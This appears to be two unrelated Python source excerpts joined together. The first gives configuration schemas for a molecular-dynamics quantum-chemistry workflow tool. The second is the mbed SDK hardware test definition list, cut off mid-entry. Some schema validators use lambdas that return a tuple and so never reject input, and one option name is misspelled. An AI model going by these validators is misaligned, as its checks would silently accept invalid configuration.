Optional("project_name", default="namd"): str,
# Working directory
Optional("scratch_path", default=None): str,
# path to the HDF5 to store the results
Optional("path_hdf5", default="quantum.hdf5"): str,
# path to xyz trajectory of the Molecular dynamics
"path_traj_xyz": os.path.exists,
# Real from where to start enumerating the folders create for each point in the MD
Optional("enumerate_from", default=0): int,
# Ignore the warning issues by the quantum package and keep computing
Optional("ignore_warnings", default=False): bool,
# Calculate the guess wave function in either the first point of the trajectory or in all
Optional("calculate_guesses", default="first"):
And(str, Use(str.lower), lambda s: s in ("first", "all")),
# Units of the molecular geometry on the MD file
Optional("geometry_units", default="angstrom"):
And(str, Use(str.lower), lambda s: s in (
"angstrom", "au")),
# Integration time step used for the MD (femtoseconds)
Optional("dt", default=1): Real,
# General settings
"cp2k_general_settings": schema_cp2k_general_settings
}
dict_derivative_couplings = {
# Name of the workflow to run
"workflow": And(
str, Use(str.lower), lambda s: s == "derivative_couplings"),
# Algorithm used to compute the derivative couplings
Optional("algorithm", default="levine"):
And(str, Use(str.lower), lambda s: ("levine", "3points")),
# Use MPI to compute the couplings
Optional("mpi", default=False): bool,
# Track the crossing between states
Optional("tracking", default=True): bool,
# Write the overlaps in ascii
Optional("write_overlaps", default=False): bool,
# Compute the overlap between molecular geometries using a dephase"
Optional("overlaps_deph", default=False): bool
}
dict_merged_derivative_couplings = merge(
dict_general_options, dict_derivative_couplings)
schema_derivative_couplings = Schema(
dict_merged_derivative_couplings)
schema_job_scheduler = Schema({
Optional("scheduler", default="SLURM"):
And(str, Use(str.upper), lambda s: ("SLURM", "PBS")),
Optional("nodes", default=1): int,
Optional("tasks", default=1): int,
Optional("wall_time", default="01:00:00"): str,
Optional("job_name", default="namd"): str,
Optional("queue_name", default="short"): str,
Optional("load_modules", default=""): str
})
dict_distribute = {
Optional("workdir", default=os.getcwd()): str,
# Number of chunks to split the trajectory
"blocks": int,
# Resource manager configuration
"job_scheduler": schema_job_scheduler,
# General settings
"cp2k_general_settings": schema_cp2k_general_settings,
}
dict_distribute_derivative_couplings = {
# Name of the workflow to run
"workflow": And(
str, Use(str.lower), lambda s: s == "distribute_derivative_couplings")
}
schema_distribute_derivative_couplings = Schema(
merge(dict_distribute, merge(
dict_merged_derivative_couplings, dict_distribute_derivative_couplings)))
dict_absorption_spectrum = {
# Name of the workflow to run
"workflow": And(
str, Use(str.lower), lambda s: s == "absorption_spectrum"),
# Type of TDDFT calculations. Available: sing_orb, stda, stddft
Optional("tddft", default="stda"): And(
str, Use(str.lower), lambda s: s in ("sing_orb", "stda", "stdft")),
# Interval between MD points where the oscillators are computed"
Optional("stride", default=1): int,
# description: Exchange-correlation functional used in the DFT calculations,
Optional("xc_dft", default="pbe"): str
}
dict_merged_absorption_spectrum = merge(
dict_general_options, dict_absorption_spectrum)
schema_absorption_spectrum = Schema(dict_merged_absorption_spectrum)
dict_distribute_absorption_spectrum = {
# Name of the workflow to run
"workflow": And(
str, Use(str.lower), lambda s: s == "distribute_absorption_spectrum")
}
schema_distribute_absorption_spectrum = Schema(
merge(dict_distribute, merge(
dict_merged_absorption_spectrum, dict_distribute_absorption_spectrum)))
dict_single_points = {
# Name of the workflow to run
"workflow": And(
str, Use(str.lower), lambda s: s == "single_points"),
# General settings
"cp2k_general_settings": schema_cp2k_general_settings
}
dict_distribute_single_points = {
# Name of the workflow to run
"workflow": And(
str, Use(str.lower), lambda s: s == "distribute_single_points")
}
dict_merged_single_points = merge(dict_general_options, dict_single_points)
schema_single_points = Schema(dict_merged_single_points)
schema_distribute_single_points = Schema(
merge(dict_distribute, merge(
dict_merged_single_points, dict_distribute_single_points)))
| |
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from tools.paths import *
from tools.data.support import *
TEST_CMSIS_LIB = join(TEST_DIR, "cmsis", "lib")
TEST_MBED_LIB = join(TEST_DIR, "mbed", "env")
PERIPHERALS = join(TEST_DIR, "peripherals")
BENCHMARKS_DIR = join(TEST_DIR, "benchmarks")
SD = join(TEST_DIR, "sd")
TMP102 = join(PERIPHERALS, 'TMP102')
AT30TSE75X = join(PERIPHERALS, 'AT30TSE75X')
"""
Wiring:
* Ground:
* LPC1*: p1
* KL25Z: GND
* Vout
* LPC1*: p40
* KL25Z: P3V3
* TMP102 (I2C):
* LPC1*: (SDA=p28 , SCL=p27)
* KL25Z: (SDA=PTC9, SCL=PTC8)
* MAXWSNENV: (SDA=TP6, SCL=TP5)
* digital_loop (Digital(In|Out|InOut), InterruptIn):
* Arduino headers: (D0 <-> D7)
* LPC1549: (D2 <-> D7)
* LPC1*: (p5 <-> p25 )
* KL25Z: (PTA5<-> PTC6)
* NUCLEO_F103RB: (PC_6 <-> PB_8)
* MAXWSNENV: (TP3 <-> TP4)
* MAX32600MBED: (P1_0 <-> P4_7)
* VK_RZ_A1H: (P3_2 <-> P5_6)
* port_loop (Port(In|Out|InOut)):
* Arduino headers: (D0 <-> D7), (D1 <-> D6)
* LPC1*: (p5 <-> p25), (p6 <-> p26)
* KL25Z: (PTA5 <-> PTC6), (PTA4 <-> PTC5)
* NUCLEO_F103RB: (PC_6 <-> PB_8), (PC_5 <-> PB_9)
* MAXWSNENV: (TP1 <-> TP3), (TP2 <-> TP4)
* MAX32600MBED: (P1_0 <-> P4_7), (P1_1 <-> P4_6)
* VK_RZ_A1H: (P3_2 <-> P5_6), (P3_7 <-> P5_1)
* analog_loop (AnalogIn, AnalogOut):
* Arduino headers: (A0 <-> A5)
* LPC1549: (A0 <-> D12)
* LPC1*: (p17 <-> p18 )
* KL25Z: (PTE30 <-> PTC2)
* analog_pot (AnalogIn):
* Arduino headers: (A0, A1)
* VK_RZ_A1H: (AN0, AN1)
* SD (SPI):
* LPC1*: (mosi=p11 , miso=p12 , sclk=p13 , cs=p14 )
* KL25Z: (mosi=PTD2, miso=PTD3, sclk=PTD1, cs=PTD0)
* MMA7660 (I2C):
* LPC1*: (SDA=p28 , SCL=p27)
* i2c_loop:
* LPC1768: (p28 <-> p9), (p27 <-> p10)
* i2c_eeprom:
* LPC1*: (SDA=p28 , SCL=p27)
* KL25Z: (SDA=PTE0, SCL=PTE1)
* VK_RZ_A1H:(SDA=P1_1, SCL=P1_0)
* can_transceiver:
* LPC1768: (RX=p9, TX=p10)
* LPC1549: (RX=D9, TX=D8)
* LPC4088: (RX=p9, TX=p10)
* VK_RZ_A1H:(RX=P5_9, TX=P5_10)
* NUCLEO_F091RC: (RX=PA_11, TX=PA_12)
* NUCLEO_F072RB: (RX=PA_11, TX=PA_12)
* NUCLEO_F042K6: (RX=PA_11, TX=PA_12)
* NUCLEO_F334R8: (RX=PA_11, TX=PA_12)
* NUCLEO_F303RE: (RX=PA_11, TX=PA_12)
* NUCLEO_F303K8: (RX=PA_11, TX=PA_12)
* NUCLEO_F302R8: (RX=PA_11, TX=PA_12)
* NUCLEO_F446RE: (RX=PA_11, TX=PA_12)
* DISCO_F469NI: (RX=PB_8, TX=PB_9)
* DISCO_F4269ZI: (RX=PA_11, TX=PA_12)
* NUCLEO_F103RB: (RX=PA_11, TX=PA_12)
* NUCLEO_F746ZG: (RX=PA_11, TX=PA_12)
* DISCO_F746NG: (RX=PB_8, TX=PB_9)
* DISCO_L476VG: (RX=PA_11, TX=PA_12)
* NUCLEO_L476RG: (RX=PA_11, TX=PA_12)
"""
TESTS = [
# Automated MBED tests
{
"id": "MBED_A1", "description": "Basic",
"source_dir": join(TEST_DIR, "mbed", "basic"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
},
{
"id": "MBED_A2", "description": "Semihost file system",
"source_dir": join(TEST_DIR, "mbed", "file"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC2368", "LPC11U24"]
},
{
"id": "MBED_A3", "description": "C++ STL",
"source_dir": join(TEST_DIR, "mbed", "stl"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False,
},
{
"id": "MBED_A4", "description": "I2C TMP102",
"source_dir": join(TEST_DIR, "mbed", "i2c_TMP102"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, TMP102],
"automated": True,
"peripherals": ["TMP102"]
},
{
"id": "MBED_AT30TSE75X", "description": "I2C Temperature Sensor / EEPROM",
"source_dir": join(TEST_DIR, "mbed", "i2c_at30tse75x"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, AT30TSE75X],
"automated": False,
"peripherals": ["AT30TSE75X"]
},
{
"id": "MBED_A5", "description": "DigitalIn DigitalOut",
"source_dir": join(TEST_DIR, "mbed", "digitalin_digitalout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"peripherals": ["digital_loop"]
},
{
"id": "MBED_A6", "description": "DigitalInOut",
"source_dir": join(TEST_DIR, "mbed", "digitalinout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"peripherals": ["digital_loop"]
},
{
"id": "MBED_A7", "description": "InterruptIn",
"source_dir": join(TEST_DIR, "mbed", "interruptin"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
"peripherals": ["digital_loop"]
},
{
"id": "MBED_A8", "description": "Analog",
"source_dir": join(TEST_DIR, "mbed", "analog"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"peripherals": ["analog_loop"],
"mcu": ["LPC1768", "LPC2368", "LPC2460", "KL25Z", "K64F", "K22F", "LPC4088", "LPC1549",
"NUCLEO_F072RB", "NUCLEO_F091RC", "NUCLEO_F302R8", "NUCLEO_F303K8", "NUCLEO_F303RE",
"NUCLEO_F334R8", "NUCLEO_L053R8", "NUCLEO_L073RZ", "NUCLEO_L152RE",
"NUCLEO_F410RB", "NUCLEO_F411RE", "NUCLEO_F446RE", "DISCO_F407VG", "DISCO_F746NG", "NUCLEO_F746ZG",
"ARCH_MAX", "MAX32600MBED", "MOTE_L152RC", "B96B_F446VE"]
},
{
"id": "MBED_A9", "description": "Serial Echo at 115200",
"source_dir": join(TEST_DIR, "mbed", "echo"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test": "echo"
},
{
"id": "MBED_A10", "description": "PortOut PortIn",
"source_dir": join(TEST_DIR, "mbed", "portout_portin"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["port_loop"],
"supported": DEFAULT_SUPPORT,
"automated": True,
},
{
"id": "MBED_A11", "description": "PortInOut",
"source_dir": join(TEST_DIR, "mbed", "portinout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["port_loop"],
"supported": DEFAULT_SUPPORT,
"automated": True,
},
{
"id": "MBED_A12", "description": "SD File System",
"source_dir": join(TEST_DIR, "mbed", "sd"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
{
"id": "MBED_A13", "description": "I2C MMA7660 accelerometer",
"source_dir": join(TEST_DIR, "mbed", "i2c_MMA7660"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'MMA7660')],
"automated": True,
"peripherals": ["MMA7660"]
},
{
"id": "MBED_A14", "description": "I2C Master",
"source_dir": join(TEST_DIR, "mbed", "i2c_master"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A15", "description": "I2C Slave",
"source_dir": join(TEST_DIR, "mbed", "i2c_slave"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A16", "description": "SPI Master",
"source_dir": join(TEST_DIR, "mbed", "spi_master"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A17", "description": "SPI Slave",
"source_dir": join(TEST_DIR, "mbed", "spi_slave"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A18", "description": "Interrupt vector relocation",
"source_dir": join(TEST_DIR, "mbed", "vtor_reloc"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
"mcu": ["LPC1768"],
"automated": True,
},
{
"id": "MBED_A19", "description": "I2C EEPROM read/write test",
"source_dir": join(TEST_DIR, "mbed", "i2c_eeprom"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["24LC256"],
"automated": True,
"duration": 15,
},
{
"id": "MBED_A20", "description": "I2C master/slave test",
"source_dir": join(TEST_DIR, "mbed", "i2c_master_slave"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
"mcu": ["LPC1768", "RZ_A1H"],
"peripherals": ["i2c_loop"]
},
{
"id": "MBED_A21", "description": "Call function before main (mbed_main)",
"source_dir": join(TEST_DIR, "mbed", "call_before_main"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
},
{
"id": "MBED_A22", "description": "SPIFI for LPC4088 (test 1)",
"source_dir": join(TEST_DIR, "mbed", "spifi1"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 30,
"mcu": ["LPC4088","LPC4088_DM"]
},
{
"id": "MBED_A23", "description": "SPIFI for LPC4088 (test 2)",
"source_dir": join(TEST_DIR, "mbed", "spifi2"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 30,
"mcu": ["LPC4088","LPC4088_DM"]
},
{
"id": "MBED_A24", "description": "Serial echo with RTS/CTS flow control",
"source_dir": join(TEST_DIR, "mbed", "echo_flow_control"),
"dependencies": [MBED_LIBRARIES],
"automated": "True",
"host_test": "echo_flow_control",
"mcu": ["LPC1768"],
"peripherals": ["extra_serial"]
},
{
"id": "MBED_A25", "description": "I2C EEPROM line read/write test",
"source_dir": join(TEST_DIR, "mbed", "i2c_eeprom_line"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["24LC256"],
"automated": True,
"duration": 10,
},
{
"id": "MBED_A26", "description": "AnalogIn potentiometer test",
"source_dir": join(TEST_DIR, "mbed", "analog_pot"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["analog_pot"],
"automated": True,
"duration": 10,
},
{
"id": "MBED_A27", "description": "CAN loopback test",
"source_dir": join(TEST_DIR, "mbed", "can_loopback"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 20,
"peripherals": ["can_transceiver"],
"mcu": ["LPC1549", "LPC1768","B96B_F446VE", "VK_RZ_A1H",
"NUCLEO_F091RC", "NUCLEO_F072RB", "NUCLEO_F042K6", "NUCLEO_F334R8",
"NUCLEO_F303RE", "NUCLEO_F303K8", "NUCLEO_F302R8", "NUCLEO_F446RE",
"DISCO_F469NI", "DISCO_F429ZI", "NUCLEO_F103RB", "NUCLEO_F746ZG",
"DISCO_F746NG", "DISCO_L476VG", "NUCLEO_L476RG"]
},
{
"id": "MBED_BLINKY", "description": "Blinky",
"source_dir": join(TEST_DIR, "mbed", "blinky"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False,
},
{
"id": "MBED_BUS", "description": "Blinky BUS",
"source_dir": join(TEST_DIR, "mbed", "bus"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False,
"duration": 15,
},
{
"id": "MBED_BUSOUT", "description": "BusOut",
"source_dir": join(TEST_DIR, "mbed", "bus_out"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 15,
},
# Size benchmarks
{
"id": "BENCHMARK_1", "description": "Size (c environment)",
"source_dir": join(BENCHMARKS_DIR, "cenv"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_2", "description": "Size (float math)",
"source_dir": join(BENCHMARKS_DIR, "float_math"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_3", "description": "Size (printf)",
"source_dir": join(BENCHMARKS_DIR, "printf"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_4", "description": "Size (mbed libs)",
"source_dir": join(BENCHMARKS_DIR, "mbed"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_5", "description": "Size (all)",
"source_dir": join(BENCHMARKS_DIR, "all"),
"dependencies": [MBED_LIBRARIES]
},
# performance related tests
{
"id": "PERF_1", "description": "SD Stdio R/W Speed",
"source_dir": join(TEST_DIR, "mbed", "sd_perf_stdio"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
{
"id": "PERF_2", "description": "SD FileHandle R/W Speed",
"source_dir": join(TEST_DIR, "mbed", "sd_perf_fhandle"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
{
"id": "PERF_3", "description": "SD FatFS R/W Speed",
"source_dir": join(TEST_DIR, "mbed", "sd_perf_fatfs"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
# Not automated MBED tests
{
"id": "MBED_1", "description": "I2C SRF08",
"source_dir": join(TEST_DIR, "mbed", "i2c_SRF08"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'SRF08')],
"peripherals": ["SRF08"]
},
{
"id": "MBED_2", "description": "stdio",
"source_dir": join(TEST_DIR, "mbed", "stdio"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 20,
"automated": True,
#"host_test": "stdio_auto"
},
{
"id": "MBED_3", "description": "PortOut",
"source_dir": join(TEST_DIR, "mbed", "portout"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_4", "description": "Sleep",
"source_dir": join(TEST_DIR, "mbed", "sleep"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 30,
"mcu": ["LPC1768", "LPC11U24", "LPC4088","LPC4088_DM","NRF51822", "LPC11U68"]
},
{
"id": "MBED_5", "description": "PWM",
"source_dir": join(TEST_DIR, "mbed", "pwm"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB]
},
{
"id": "MBED_6", "description": "SW Reset",
"source_dir": join(TEST_DIR, "mbed", "reset"),
"dependencies": [MBED_LIBRARIES],
"duration": 15
},
{
"id": "MBED_7", "description": "stdio benchmark",
"source_dir": join(TEST_DIR, "mbed", "stdio_benchmark"),
"dependencies": [MBED_LIBRARIES],
"duration": 40
},
{
"id": "MBED_8", "description": "SPI",
"source_dir": join(TEST_DIR, "mbed", "spi"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_9", "description": "Sleep Timeout",
"source_dir": join(TEST_DIR, "mbed", "sleep_timeout"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_10", "description": "Hello World",
"source_dir": join(TEST_DIR, "mbed", "hello"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test": "hello_auto",
},
{
"id": "MBED_11", "description": "Ticker Int",
"source_dir": join(TEST_DIR, "mbed", "ticker"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test": "wait_us_auto",
"duration": 20,
},
{
"id": "MBED_12", "description": "C++",
"source_dir": join(TEST_DIR, "mbed", "cpp"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
{
"id": "MBED_13", "description": "Heap & Stack",
"source_dir": join(TEST_DIR, "mbed", "heap_and_stack"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
},
{
"id": "MBED_14", "description": "Serial Interrupt",
"source_dir": join(TEST_DIR, "mbed", "serial_interrupt"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
},
{
"id": "MBED_15", "description": "RPC",
"source_dir": join(TEST_DIR, "mbed", "rpc"),
"dependencies": [MBED_LIBRARIES, join(LIB_DIR, "rpc"), TEST_MBED_LIB],
"automated": False,
"mcu": ["LPC1768"]
},
{
"id": "MBED_16", "description": "RTC",
"source_dir": join(TEST_DIR, "mbed", "rtc"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"exclude_mcu": ["NRF51822", "NRF51822_BOOT", "NRF51822_OTA", "NRF51822_Y5_MBUG",
"NRF51_DK", "NRF51_DK_BOOT", "NRF51_DK_OTA",
"NRF51_MICROBIT", "NRF51_MICROBIT_B", "NRF51_MICROBIT_BOOT",
"NRF51_MICROBIT_B_BOOT", "NRF51_MICROBIT_B_OTA", "NRF51_MICROBIT_OTA",
"HRM1017", "HRM1017_BOOT", "HRM1701_OTA",
"TY51822R3", "TY51822R3_BOOT", "TY51822R3_OTA",
"NRF15_DONGLE", "NRF15_DONGLE_BOOT", "NRF15_DONGLE_OTA",
"ARCH_BLE", "ARCH_BLE_BOOT", "ARCH_BLE_OTA",
"ARCH_LINK", "ARCH_LINK_BOOT", "ARCH_LINK_OTA",
"RBLAB_BLENANO", "RBLAB_BLENANO_BOOT", "RBLAB_BLENANO_OTA",
"RBLAB_NRF51822", "RBLAB_NRF51822_BOOT", "RBLAB_NRF51822_OTA",
"SEEED_TINY_BLE", "SEEED_TINY_BLE_BOOT", "SEEED_TINY_BLE_OTA",
"WALLBOT_BLE", "WALLBOT_BLE_BOOT", "WALLBOT_BLE_OTA",
"DELTA_DFCM_NNN40", "DELTA_DFCM_NNN40_BOOT", "DELTA_DFCM_NNN40_OTA",
"LPC1114"],
#"host_test": "rtc_auto",
"duration": 15
},
{
"id": "MBED_17", "description": "Serial Interrupt 2",
"source_dir": join(TEST_DIR, "mbed", "serial_interrupt_2"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_18", "description": "Local FS Directory",
"source_dir": join(TEST_DIR, "mbed", "dir"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_19", "description": "SD FS Directory",
"source_dir": join(TEST_DIR, "mbed", "dir_sd"),
"dependencies": [MBED_LIBRARIES, FS_LIBRARY],
"peripherals": ["SD"]
},
{
"id": "MBED_20", "description": "InterruptIn 2",
"source_dir": join(TEST_DIR, "mbed", "interruptin_2"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_21", "description": "freopen Stream",
"source_dir": join(TEST_DIR, "mbed", "freopen"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_22", "description": "Semihost",
"source_dir": join(TEST_DIR, "mbed", "semihost"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC2368", "LPC11U24"]
},
{
"id": "MBED_23", "description": "Ticker Int us",
"source_dir": join(TEST_DIR, "mbed", "ticker_2"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_24", "description": "Timeout Int us",
"source_dir": join(TEST_DIR, "mbed", "timeout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_25", "description": "Time us",
"source_dir": join(TEST_DIR, "mbed", "time_us"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_26", "description": "Integer constant division",
"source_dir": join(TEST_DIR, "mbed", "div"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
},
{
"id": "MBED_27", "description": "SPI ADXL345",
"source_dir": join(TEST_DIR, "mbed", "spi_ADXL345"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'ADXL345')],
"peripherals": ["ADXL345"]
},
{
"id": "MBED_28", "description": "Interrupt chaining (InterruptManager)",
"source_dir": join(TEST_DIR, "mbed", "interrupt_chaining"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
},
{
"id": "MBED_29", "description": "CAN network test",
"source_dir": join(TEST_DIR, "mbed", "can"),
"dependencies": [MBED_LIBRARIES],
"mcu": ["LPC1768", "LPC4088", "LPC1549", "RZ_A1H", "B96B_F446VE", "NUCLEO_F091RC",
"NUCLEO_F072RB", "NUCLEO_F042K6", "NUCLEO_F334R8", "NUCLEO_F303RE",
"NUCLEO_F303K8", "NUCLEO_F302R8", "NUCLEO_F446RE", "DISCO_F469NI",
"DISCO_F429ZI", "NUCLEO_F103RB", "NUCLEO_F746ZG", "DISCO_F746NG",
"NUCLEO_L476RG"]
},
{
"id": "MBED_30", "description": "CAN network test using interrupts",
"source_dir": join(TEST_DIR, "mbed", "can_interrupt"),
"dependencies": [MBED_LIBRARIES],
"mcu": ["LPC1768", "LPC4088", "LPC1549", "RZ_A1H", "B96B_F446VE", "NUCLEO_F091RC",
"NUCLEO_F072RB", "NUCLEO_F042K6", "NUCLEO_F334R8", "NUCLEO_F303RE",
"NUCLEO_F303K8", "NUCLEO_F302R8", "NUCLEO_F446RE", "DISCO_F469NI",
"DISCO_F429ZI", "NUCLEO_F103RB", "NUCLEO_F746ZG", "DISCO_F746NG",
"NUCLEO_L476RG"]
},
{
"id": "MBED_31", "description": "PWM LED test",
"source_dir": join(TEST_DIR, "mbed", "pwm_led"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_32", "description": "Pin toggling",
"source_dir": join(TEST_DIR, "mbed", "pin_toggling"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_33", "description": "C string operations",
"source_dir": join(TEST_DIR, "mbed", "cstring"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 10,
"automated": False,
},
{
"id": "MBED_34", "description": "Ticker Two callbacks",
"source_dir": join(TEST_DIR, "mbed", "ticker_3"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_35", "description": "SPI C12832 display",
"source_dir": join(TEST_DIR, "mbed", "spi_C12832"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'C12832')],
"peripherals": ["C12832"],
"automated": True,
"duration": 10,
},
{
"id": "MBED_36", "description": "WFI correct behavior",
"source_dir": join(TEST_DIR, "mbed", "wfi"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False
},
{
"id": "MBED_37", "description": "Serial NC RX",
"source_dir": join(TEST_DIR, "mbed", "serial_nc_rx"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
{
"id": "MBED_38", "description": "Serial NC TX",
"source_dir": join(TEST_DIR, "mbed", "serial_nc_tx"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
{
"id": "MBED_39", "description": "Serial Complete",
"source_dir": join(TEST_DIR, "mbed", "serial_complete"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
# CMSIS RTOS tests
{
"id": "CMSIS_RTOS_1", "description": "Basic",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "basic"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
{
"id": "CMSIS_RTOS_2", "description": "Mutex",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "mutex"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_3", "description": "Semaphore",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "semaphore"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_4", "description": "Signals",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "signals"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
{
"id": "CMSIS_RTOS_5", "description": "Queue",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "queue"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_6", "description": "Mail",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "mail"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
"duration": 20
},
{
"id": "CMSIS_RTOS_7", "description": "Timer",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "timer"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
{
"id": "CMSIS_RTOS_8", "description": "ISR",
"source_dir": join(TEST_DIR, "rtos", "cmsis", "isr"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES],
},
# mbed RTOS tests
{
"id": "RTOS_1", "description": "Basic thread",
"source_dir": join(TEST_DIR, "rtos", "mbed", "basic"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto",
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
